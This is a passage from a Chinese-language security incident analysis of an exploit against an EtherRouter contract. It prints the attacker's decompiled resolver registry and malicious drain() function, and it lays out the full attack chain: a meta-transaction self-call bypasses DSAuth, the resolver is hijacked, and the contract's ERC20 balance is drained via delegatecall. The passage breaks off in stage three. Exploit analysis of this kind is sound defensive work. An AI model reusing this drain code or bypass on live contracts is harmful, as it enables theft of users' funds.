255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（未开源，反编译）：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="typescript"><code><span leaf="">contract <span class="code-snippet__title">FunctionPointerRegistry</span> {</span></code><br/><code><span leaf="">    <span class="code-snippet__title">mapping</span>(<span class="code-snippet__function"><span class="code-snippet__params">bytes4</span></span><span class="code-snippet__function"> =&gt;</span> address) <span class="code-snippet__keyword">private</span> _lookup;</span></code><br/><code></code><br/><code><span leaf="">    <span class="code-snippet__keyword">function</span> <span class="code-snippet__title">lookup</span>(<span class="code-snippet__params">bytes4 sig</span>) <span class="code-snippet__keyword">public</span> <span class="code-snippet__title">returns</span> (address) {</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">return</span> _lookup[sig];</span></code><br/><code><span leaf="">    }</span></code><br/><code></code><br/><code><span leaf="">    <span class="code-snippet__comment">// ⚠️ 漏洞点：无任何权限控制，任何人可注册任意 selector → implementation 映射</span></span></code><br/><code><span leaf="">    <span class="code-snippet__keyword">function</span> <span class="code-snippet__title">set</span>(<span class="code-snippet__params">bytes4 functionSig, address implementation</span>) <span class="code-snippet__keyword">public</span> {</span></code><br/><code><span leaf="">        _lookup[functionSig] = implementation;</span></code><br/><code><span leaf="">    }</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意 Drain 实现</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x0b971e0a8ecc7d5b2465c903cf75aeaedbfc39e2</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（未开源，反编译）：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="java"><code><span leaf="">function <span class="code-snippet__title">drain</span><span class="code-snippet__params">(address token, address recipient)</span> <span class="code-snippet__keyword">public</span> {</span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// ⚠️ 由于该函数由受害合约 delegatecall 执行，</span></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// address(this) 实际为受害合约地址 0x5c59...</span></span></code><br/><code><span leaf="">    <span class="code-snippet__type">uint256</span> <span class="code-snippet__variable">balance</span> <span class="code-snippet__operator">=</span> IERC20(token).balanceOf(address(<span class="code-snippet__built_in">this</span>));</span></code><br/><code><span leaf="">    IERC20(token).transfer(recipient, balance);</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">攻击盈利公式</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="kotlin"><code><span leaf="">攻击者 EOA 签名 → executeMetaTransaction 自调用 setResolver(恶意 resolver)</span></code><br/><code><span leaf="">→ DSAuth 自调用绕过 → resolver 被劫持</span></code><br/><code><span leaf="">→ 调用 EtherRouter.drain(token, attacker)</span></code><br/><code><span leaf="">→ fallback() → 恶意 resolver.lookup(<span class="code-snippet__number">0x837971e4</span>) → 恶意 drain 实现</span></code><br/><code><span leaf="">→ delegatecall → drain 中 address(<span class="code-snippet__keyword">this</span>) == 受害合约</span></code><br/><code><span leaf="">→ IERC20(token).balanceOf(受害合约) → IERC20(token).transfer(attacker, balance)</span></code><br/><code><span leaf="">= 攻击者获得受害合约持有的全部 ERC20</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">攻击流程</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击过程仅在一笔交易中完成，所有逻辑在临时攻击合约 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x835a701fd76b96a76ee84de037d41f059ee29f5c</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的 constructor 中执行。</span></span></p></b></p><p><b data-pm-slice="0 0 []"><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">第一阶段：部署恶意基础设施</span></span></h3><ol class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者 EOA </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0xeed236afb6967f74099a0a6bf078bc6b865fbf28</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 发起交易，创建临时攻击合约 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x835a701fd76b96a76ee84de037d41f059ee29f5c</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击合约调用恶意 resolver </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x4e321af09012e15a67756522187c05b108b7ee0a</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">set(bytes4,address)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，将 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">drain(address,address)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的选择器 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x837971e4</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 映射到恶意 drain 实现 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x0b971e0a8ecc7d5b2465c903cf75aeaedbfc39e2</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li></ol><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">第二阶段：通过元交易自调用劫持 Resolver</span></span></h3><ol class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击合约调用受害合约 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x5c59d0ec51729e40c413903be6a4612f4e2452da</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">executeMetaTransaction()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。由于该函数不在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">EtherRouter</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 自身 ABI 中，调用进入 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">fallback()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，由旧 resolver 路由到元交易实现 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x4e7f1e...</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">executeMetaTransaction</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ecrecover</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 校验签名，恢复出攻击者 EOA，签名验证通过（攻击者使用的是自己的有效签名，非签名伪造）。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">executeMetaTransaction</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 构造自调用 calldata </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">setResolver(0x4e321af...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 并执行 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">address(this).call(callData)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。此时上下文是受害合约，所以 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">msg.sender == 0x5c59...</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DSAuth.isAuthorized()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 因 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">src == address(this)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 返回 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">true</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，resolver 被成功替换。</span></span></p></li></ol><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">第三阶段：通过被劫持的 Resolver 清空资产</span></span></h3><ol class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击合约调用受害合约的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, 